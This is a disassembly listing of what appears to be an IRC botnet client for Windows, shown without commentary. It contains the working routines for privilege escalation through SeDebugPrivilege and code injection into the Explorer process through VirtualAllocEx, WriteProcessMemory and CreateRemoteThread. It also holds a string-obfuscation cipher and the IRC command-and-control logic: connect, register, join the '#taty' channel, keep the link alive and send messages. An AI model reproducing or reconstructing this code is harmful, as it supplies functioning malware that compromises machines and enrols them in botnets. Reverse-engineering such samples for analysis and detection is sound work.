push offset loc_31105120
push eax
call sub_311037D4 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_31105AF8
push eax
call sub_311037D4 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31105A7C
push eax
call sub_311037D4 ; memcpy
add esp, 40h
push offset loc_31105120
call sub_311037E0 ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset loc_31105120
push eax
call sub_311037D4 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31101AE3: ; CODE XREF: sub_31101651+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31101AE3
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_311037DA ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_311037DA ; memset
add esp, 18h
jmp loc_311018E8
; ---------------------------------------------------------------------------
loc_31101B37: ; CODE XREF: sub_31101651+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_31105788
push eax
call sub_311037D4 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_311037D4 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_31105808
push eax
call sub_311037D4 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_31101B8F: ; CODE XREF: sub_31101651+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_31101B9C: ; CODE XREF: sub_31101651+1AD�j
; sub_31101651+1E1�j ...
push 2
push [ebp+var_4]
call dword_3110117C ; shutdown
loc_31101BA7: ; CODE XREF: sub_31101651+166�j
push [ebp+var_4]
call dword_31101194 ; closesocket
pop esi
loc_31101BB1: ; CODE XREF: sub_31101651+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_31101651 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31101BB8 proc near ; CODE XREF: UPX0:loc_31102E26�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_311010E0 ; LoadLibraryA
mov esi, dword_311010DC
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_31101C3C
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_31101C3C
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_31101C3C
lea eax, [ebp+var_C]
push eax
push 20h
call dword_311010D8 ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_31101C3C: ; CODE XREF: sub_31101BB8+28�j
; sub_31101BB8+37�j ...
pop edi
pop esi
leave
retn
sub_31101BB8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31101C40 proc near ; CODE XREF: UPX0:31102E3A�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, ds:dword_3110602C
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_311010EC ; GetModuleHandleA
mov esi, dword_311010DC
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_31101C87
loc_31101C83: ; CODE XREF: sub_31101C40+54�j
push 1
jmp short loc_31101CD8
; ---------------------------------------------------------------------------
loc_31101C87: ; CODE XREF: sub_31101C40+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_31101C83
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31101138 ; FindWindowA
test eax, eax
jnz short loc_31101CB5
call dword_31101134 ; GetForegroundWindow
test eax, eax
jnz short loc_31101CB5
push 2
jmp short loc_31101CD8
; ---------------------------------------------------------------------------
loc_31101CB5: ; CODE XREF: sub_31101C40+65�j
; sub_31101C40+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_3110113C ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_311010E8 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_31101CDB
push 3
loc_31101CD8: ; CODE XREF: sub_31101C40+45�j
; sub_31101C40+73�j
pop eax
jmp short loc_31101D46
; ---------------------------------------------------------------------------
loc_31101CDB: ; CODE XREF: sub_31101C40+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_311010A4
test eax, eax
jz short loc_31101D39
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_311010E4 ; WriteProcessMemory
push ds:dword_31106000
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31101D25
push eax
call esi ; CloseHandle
jmp short loc_31101D40
; ---------------------------------------------------------------------------
loc_31101D25: ; CODE XREF: sub_31101C40+DE�j
push offset aUterm11 ; "uterm11"
call sub_31102AC6
pop ecx
mov [ebp+var_4], 5
jmp short loc_31101D40
; ---------------------------------------------------------------------------
loc_31101D39: ; CODE XREF: sub_31101C40+B2�j
mov [ebp+var_4], 4
loc_31101D40: ; CODE XREF: sub_31101C40+E3�j
; sub_31101C40+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_31101D46: ; CODE XREF: sub_31101C40+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_31101C40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31101D4B proc near ; CODE XREF: sub_31101DD0+25�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31101D7E
add ebx, 1Ah
loc_31101D7E: ; CODE XREF: sub_31101D4B+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31101118
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31101DA8
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31101DCB
; ---------------------------------------------------------------------------
loc_31101DA8: ; CODE XREF: sub_31101D4B+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31101DC8
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31101DCB
; ---------------------------------------------------------------------------
loc_31101DC8: ; CODE XREF: sub_31101D4B+68�j
mov al, [ebp+arg_0]
loc_31101DCB: ; CODE XREF: sub_31101D4B+5B�j
; sub_31101D4B+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31101D4B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31101DD0 proc near ; CODE XREF: sub_3110277D+F7�p
; sub_3110277D+137�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_31101E2B
mov edi, [ebp+arg_0]
push ebx
loc_31101DE5: ; CODE XREF: sub_31101DD0+56�j
mov bl, al
inc [ebp+arg_4]
mov eax, esi
mov byte ptr [ebp+arg_0], bl
neg eax
push eax
push [ebp+arg_0]
call sub_31101D4B
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_31101E0F
cmp bl, 7Ah
jg short loc_31101E0F
movsx esi, bl
sub esi, 61h
loc_31101E0F: ; CODE XREF: sub_31101DD0+32�j
; sub_31101DD0+37�j
cmp bl, 41h
jl short loc_31101E1F
cmp bl, 5Ah
jg short loc_31101E1F
movsx esi, bl
sub esi, 41h
loc_31101E1F: ; CODE XREF: sub_31101DD0+42�j
; sub_31101DD0+47�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_31101DE5
pop ebx
jmp short loc_31101E2E
; ---------------------------------------------------------------------------
loc_31101E2B: ; CODE XREF: sub_31101DD0+F�j
mov edi, [ebp+arg_0]
loc_31101E2E: ; CODE XREF: sub_31101DD0+59�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_31101DD0 endp
; =============== S U B R O U T I N E =======================================
sub_31101E35 proc near ; CODE XREF: sub_31102463+66�p
push esi
mov esi, ecx
push 20001h
call sub_311037AE
mov [esi+2Ch], eax
pop ecx
mov eax, esi
pop esi
retn
sub_31101E35 endp
; =============== S U B R O U T I N E =======================================
sub_31101E4A proc near ; CODE XREF: sub_31102463+C6�p
; sub_31102463+119�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push 27h
push [esp+8+arg_0]
lea eax, [esi+4]
push eax
call dword_311010B0 ; lstrcpynA
mov eax, [esp+4+arg_4]
mov [esi+58h], eax
pop esi
retn 8
sub_31101E4A endp
; ---------------------------------------------------------------------------
loc_31101E68: ; CODE XREF: UPX0:3110386E�j
push esi
mov esi, ecx
lea eax, [esi+4]
push eax
call sub_311037C2
push dword ptr [esi+2Ch]
call sub_311037C2
pop ecx
pop ecx
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_31101E80 proc near ; CODE XREF: sub_31102463+E4�p
; sub_31102463+137�p
var_138 = byte ptr -138h
var_12C = byte ptr -12Ch
var_128 = byte ptr -128h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 138h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
push ebx
push 1
mov esi, ecx
push 2
call dword_31101180 ; socket
mov [esi+5Ch], eax
lea eax, [esi+4]
push eax
call sub_31102B96
mov [esi+64h], eax
mov ax, [esi+58h]
pop ecx
lea edi, [esi+60h]
push eax
mov word ptr [edi], 2
call dword_31101184 ; ntohs
push 10h
push edi
push dword ptr [esi+5Ch]
mov [esi+62h], ax
call dword_31101178 ; connect
test eax, eax
jnz loc_31102085
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31101198 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31102085
mov ecx, [esi+2Ch]
and [ecx+eax], bl
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_311020C2
lea eax, [esp+148h+var_138]
push 9
push eax
call sub_31102B10
mov ebp, dword_31101130
lea eax, [esp+150h+var_138]
push eax
lea eax, [esp+154h+var_12C]
push offset aPassS ; "PASS %s\r\n"
push eax
call ebp ; wsprintfA
mov edi, dword_311010D4
add esp, 14h
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push ebx
mov ebx, dword_311010D0
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3110119C ; send
push [esp+148h+arg_0]
lea eax, [esp+14Ch+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp ; wsprintfA
add esp, 0Ch
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3110119C ; send
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31101198 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31102085
mov ecx, [esi+2Ch]
push 64h
and byte ptr [ecx+eax], 0
call edi ; Sleep
loc_31101FA9: ; CODE XREF: sub_31101E80+1AD�j
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_311020C2
push offset aAlready ; "already"
push dword ptr [esi+2Ch]
call dword_31101114 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31102032
push [esp+148h+arg_4]
push [esp+14Ch+arg_0]
call sub_31102B10
push [esp+150h+arg_0]
lea eax, [esp+154h+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp ; wsprintfA
add esp, 14h
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3110119C ; send
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31101198 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_31102085
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
jmp loc_31101FA9
; ---------------------------------------------------------------------------
loc_31102032: ; CODE XREF: sub_31101E80+145�j
push [esp+148h+arg_8]
lea eax, [esp+14Ch+var_12C]
push [esp+14Ch+arg_0]
push offset aUserS8S ; "USER %s 8 * :%s\r\n"
push eax
call ebp ; wsprintfA
add esp, 10h
push 64h
call edi ; Sleep
xor edi, edi
lea eax, [esp+148h+var_12C]
push edi
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3110119C ; send
push edi
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31101198 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_31102093
loc_31102085: ; CODE XREF: sub_31101E80+4E�j
; sub_31101E80+6B�j ...
push dword ptr [esi+5Ch]
call dword_31101194 ; closesocket
push 1
pop eax
jmp short loc_311020B5
; ---------------------------------------------------------------------------
loc_31102093: ; CODE XREF: sub_31101E80+203�j
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_311020C2
mov [esi+284h], edi
mov [esi+7Ch], edi
mov [esi+70h], edi
mov [esi+74h], edi
xor eax, eax
loc_311020B5: ; CODE XREF: sub_31101E80+211�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 138h
retn 0Ch
sub_31101E80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_311020C2 proc near ; CODE XREF: sub_31101E80+7C�p
; sub_31101E80+12E�p ...
var_190 = byte ptr -190h
var_64 = byte ptr -64h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
push ebx
push esi
push edi
push offset aPing ; "PING"
push [ebp+arg_0]
mov ebx, ecx
call dword_31101114 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_3110213C
mov esi, dword_311010D0
lea edi, [eax+4]
push edi
call esi ; lstrlenA
dec eax
cmp eax, 63h
jle short loc_311020FB
push 1
pop eax
jmp short loc_3110213E
; ---------------------------------------------------------------------------
loc_311020FB: ; CODE XREF: sub_311020C2+32�j
push eax
lea eax, [ebp+var_64]
push edi
push eax
call dword_311010B0 ; lstrcpynA
lea eax, [ebp+var_64]
push eax
lea eax, [ebp+var_190]
push offset aPongS ; "PONG%s\r\n"
push eax
call dword_31101130 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_190]
push 0
push eax
call esi ; lstrlenA
push eax
lea eax, [ebp+var_190]
push eax
push dword ptr [ebx+5Ch]
call dword_3110119C ; send
loc_3110213C: ; CODE XREF: sub_311020C2+20�j
xor eax, eax
loc_3110213E: ; CODE XREF: sub_311020C2+37�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_311020C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31102145 proc near ; CODE XREF: sub_31102463+185�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 12Ch
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_12C]
mov esi, ecx
push offset aJoinS ; "JOIN %s\r\n"
push eax
call dword_31101130 ; wsprintfA
mov edi, dword_311010D4
add esp, 0Ch
push 64h
call edi ; Sleep
lea eax, [ebp+var_12C]
push 0
push eax
call dword_311010D0 ; lstrlenA
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [esi+5Ch]
call dword_3110119C ; send
push 64h
call edi ; Sleep
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31101198 ; recv
mov ecx, [esi+2Ch]
mov [esi], eax
and byte ptr [ecx+eax], 0
mov eax, [esi]
cmp eax, 0FFFFFFFFh
jz short loc_3110220E
test eax, eax
jz short loc_3110220E
push 64h
call edi ; Sleep
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_311020C2
mov edi, dword_31101114
push offset a451 ; "451"
push dword ptr [esi+2Ch]
call edi ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_311021E7
push 3
jmp short loc_31102210
; ---------------------------------------------------------------------------
loc_311021E7: ; CODE XREF: sub_31102145+9C�j
push offset aPing ; "PING"
push dword ptr [esi+2Ch]
call edi ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_311021FB
push 4
jmp short loc_31102210
; ---------------------------------------------------------------------------
loc_311021FB: ; CODE XREF: sub_31102145+B0�j
push 23h
add esi, 30h
push [ebp+arg_0]
push esi
call dword_311010B0 ; lstrcpynA
xor eax, eax
jmp short loc_31102211
; ---------------------------------------------------------------------------
loc_3110220E: ; CODE XREF: sub_31102145+74�j
; sub_31102145+78�j
push 2
loc_31102210: ; CODE XREF: sub_31102145+A0�j
; sub_31102145+B4�j
pop eax
loc_31102211: ; CODE XREF: sub_31102145+C7�j
pop edi
pop esi
leave
retn 4
sub_31102145 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31102217 proc near ; CODE XREF: sub_31102280+83�p
; sub_31102463+1E1�p
var_14C = byte ptr -14Ch
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 14Ch
push esi
mov esi, ecx
call dword_31101128 ; rand
sub eax, 3
and eax, 7
push eax
lea eax, [ebp+var_20]
push eax
call sub_31102B10
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14C]
push offset aQuitS ; "QUIT %s\r\n"
push eax
call dword_31101130 ; wsprintfA
add esp, 14h
lea eax, [ebp+var_14C]
push 0
push eax
call dword_311010D0 ; lstrlenA
push eax
lea eax, [ebp+var_14C]
push eax
push dword ptr [esi+5Ch]
call dword_3110119C ; send
push dword ptr [esi+5Ch]
call dword_31101194 ; closesocket
xor eax, eax
pop esi
leave
retn
sub_31102217 endp
; =============== S U B R O U T I N E =======================================
sub_31102280 proc near ; CODE XREF: sub_31102463+1C9�p
mov eax, offset loc_3110385C
call sub_31103830
sub esp, 110h
push ebx
push esi
push edi
mov edi, dword_311010F0
mov esi, ecx
mov [ebp-10h], esp
mov [ebp-14h], esi
call edi ; GetTickCount
mov [ebp-18h], eax
mov eax, [esi+5Ch]
mov dword ptr [ebp-11Ch], 1
mov [ebp-118h], eax
xor ebx, ebx
loc_311022BB: ; CODE XREF: sub_31102280+EF�j
call sub_31102C10
test eax, eax
jz short loc_31102308
push ebx
push ebx
lea eax, [ebp-11Ch]
push ebx
push eax
push 1
call dword_31101170 ; select
cmp eax, 0FFFFFFFFh
jz short loc_31102308
call sub_31102E4E
test eax, eax
jz short loc_311022EC
push 1
call dword_311010BC ; ExitThread
loc_311022EC: ; CODE XREF: sub_31102280+62�j
mov [ebp-4], ebx
call edi ; GetTickCount
mov ecx, [ebp+8]
sub eax, [ebp-18h]
imul ecx, 0EA60h
cmp eax, ecx
jbe short loc_3110231B
mov ecx, esi
call sub_31102217
loc_31102308: ; CODE XREF: sub_31102280+42�j
; sub_31102280+59�j ...
xor eax, eax
loc_3110230A: ; CODE XREF: sub_31102280+109�j
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_3110231B: ; CODE XREF: sub_31102280+7F�j
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31101198 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_31102386
mov ecx, [esi+2Ch]
push 64h
mov [ecx+eax], bl
call dword_311010D4 ; Sleep
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_311020C2
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3110277D
cmp eax, ebx
jnz short loc_31102308
or dword ptr [ebp-4], 0FFFFFFFFh
call sub_31102C10
test eax, eax
jz short loc_31102308
push 64h
call dword_311010D4 ; Sleep
jmp loc_311022BB
; ---------------------------------------------------------------------------
loc_31102374: ; DATA XREF: UPX0:311038D4�o
mov eax, [ebp-14h]
push dword ptr [eax+5Ch]
call dword_31101194 ; closesocket
mov eax, offset loc_31102386
retn
; ---------------------------------------------------------------------------
loc_31102386: ; CODE XREF: sub_31102280+B2�j
; DATA XREF: sub_31102280+100�o
push 1
pop eax
jmp loc_3110230A
sub_31102280 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3110238E proc near ; CODE XREF: sub_3110277D+9C�p
; sub_3110277D+2B7�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 12Ch
push ebx
push esi
mov esi, dword_311010D0
push edi
push [ebp+arg_0]
mov edi, ecx
call esi ; lstrlenA
push [ebp+arg_4]
mov ebx, eax
call esi ; lstrlenA
add ebx, eax
cmp ebx, 10Eh
jle short loc_311023BD
push 1
pop eax
jmp short loc_311023FE
; ---------------------------------------------------------------------------
loc_311023BD: ; CODE XREF: sub_3110238E+28�j
push [ebp+arg_4]
lea eax, [ebp+var_12C]
push [ebp+arg_0]
push offset aPrivmsgSS ; "PRIVMSG %s %s\r\n"
push eax
call dword_31101130 ; wsprintfA
add esp, 10h
push 64h
call dword_311010D4 ; Sleep
lea eax, [ebp+var_12C]
push 0
push eax
call esi ; lstrlenA
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [edi+5Ch]
call dword_3110119C ; send
xor eax, eax
loc_311023FE: ; CODE XREF: sub_3110238E+2D�j
pop edi
pop esi
pop ebx
leave
retn 8
sub_3110238E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31102405 proc near ; CODE XREF: sub_31102463+7C�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
lea eax, [ebp+var_10]
push eax
call dword_311010A0 ; GetSystemTime
movzx eax, [ebp+var_10]
movzx ecx, [ebp+var_E]
lea eax, [eax+eax*2]
add eax, ecx
movzx ecx, [ebp+var_A]
add eax, ecx
push eax
call dword_31101108 ; srand
mov eax, [ebp+arg_0]
push 7
mov byte ptr [eax], 23h
inc eax
push eax
call sub_31102B10
push 8
push [ebp+arg_4]
call sub_31102B10
add esp, 14h
call dword_31101128 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
mov [eax], edx
call sub_31102A98
leave
retn
sub_31102405 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_31102463 proc near ; DATA XREF: sub_31102E62+D6�o
mov eax, offset loc_31103873
call sub_31103830
sub esp, 2E8h
push ebx
push esi
xor ebx, ebx
push edi
mov dword_31105FC8, ebx
call sub_31102A98
mov esi, dword_31101128
call esi ; rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp-4Ch]
add edx, ecx
push edx
push eax
call sub_31102B10
cmp ds:dword_3110603C, ebx
mov edi, dword_31101090
pop ecx
pop ecx
jz short loc_311024B8
lea eax, [ebp-4Ch]
push offset a_ ; "_"
push eax
call edi ; lstrcatA
loc_311024B8: ; CODE XREF: sub_31102463+48�j
lea eax, [ebp-4Ch]
push offset a11 ; "11"
push eax
call edi ; lstrcatA
lea ecx, [ebp-2F4h]
call sub_31101E35
mov [ebp-4], ebx
loc_311024D1: ; CODE XREF: sub_31102463+1D5�j
; sub_31102463+1FB�j
push offset dword_31105FCC
lea eax, [ebp-18h]
push offset dword_31105FD0
push eax
call sub_31102405
add esp, 0Ch
loc_311024E7: ; CODE XREF: sub_31102463+98�j
call sub_31102C10
test eax, eax
jnz short loc_311024FD
push 3E8h
call dword_311010D4 ; Sleep
jmp short loc_311024E7
; ---------------------------------------------------------------------------
loc_311024FD: ; CODE XREF: sub_31102463+8B�j
xor ebx, ebx
call esi ; rand
push 7
cdq
pop ecx
idiv ecx
lea eax, [ebp-6Ch]
add edx, 5
push edx
push eax
call sub_31102B10
pop ecx
xor edi, edi
pop ecx
loc_31102518: ; CODE XREF: sub_31102463+F1�j
push 1A0Bh
lea ecx, [ebp-2F4h]
push off_31105BC0
call sub_31101E4A
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_311010D0 ; lstrlenA
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-2F4h]
call sub_31101E80
test eax, eax
jz short loc_311025AB
inc edi
cmp edi, 8
jl short loc_31102518
xor edi, edi
loc_31102558: ; CODE XREF: sub_31102463+144�j
call sub_31102C10
test eax, eax
jz short loc_311025B9
push 1A0Bh
call esi ; rand
push 0Ch
xor edx, edx
pop ecx
div ecx
lea ecx, [ebp-2F4h]
push off_31105BC0[edx*4]
call sub_31101E4A
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_311010D0 ; lstrlenA
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-2F4h]
call sub_31101E80
test eax, eax
jz short loc_311025B6
inc edi
cmp edi, 30h
jb short loc_31102558
jmp short loc_311025B9
; ---------------------------------------------------------------------------
loc_311025AB: ; CODE XREF: sub_31102463+EB�j
push 1
pop ebx
mov dword_31105FC8, ebx
jmp short loc_311025C2
; ---------------------------------------------------------------------------
loc_311025B6: ; CODE XREF: sub_31102463+13E�j
push 1
pop ebx
loc_311025B9: ; CODE XREF: sub_31102463+FC�j
; sub_31102463+146�j
cmp dword_31105FC8, 0
jz short loc_311025D1
loc_311025C2: ; CODE XREF: sub_31102463+151�j
lea eax, [ebp-18h]
push offset aTaty ; "#taty"
push eax
call dword_31101094 ; lstrcpyA
loc_311025D1: ; CODE XREF: sub_31102463+15D�j
test ebx, ebx
jz short loc_31102649
call sub_31102C10
test eax, eax
jz short loc_31102649
loc_311025DE: ; CODE XREF: sub_31102463+1A0�j
lea eax, [ebp-18h]
lea ecx, [ebp-2F4h]
push eax
call sub_31102145
test eax, eax
jz short loc_31102605
push 3E8h
call dword_311010D4 ; Sleep
call sub_31102C10
test eax, eax
jnz short loc_311025DE
loc_31102605: ; CODE XREF: sub_31102463+18C�j
cmp dword_31105FC8, 0
jz short loc_31102615
mov edx, 0A8C0h
jmp short loc_31102625
; ---------------------------------------------------------------------------
loc_31102615: ; CODE XREF: sub_31102463+1A9�j
call esi ; rand
cdq
mov ecx, 1F4h
idiv ecx
add edx, 578h
loc_31102625: ; CODE XREF: sub_31102463+1B0�j
push edx
lea ecx, [ebp-2F4h]
call sub_31102280
call sub_31102C10
test eax, eax
jz loc_311024D1
lea ecx, [ebp-2F4h]
call sub_31102217
loc_31102649: ; CODE XREF: sub_31102463+170�j
; sub_31102463+179�j
call esi ; rand
push 0Ah
cdq
pop ecx
idiv ecx
imul edx, 0EA60h
push edx
call dword_311010D4 ; Sleep
jmp loc_311024D1
sub_31102463 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31102663 proc near ; CODE XREF: sub_3110277D+5E�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31101144 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_3110268E
push 1
jmp loc_31102724
; ---------------------------------------------------------------------------
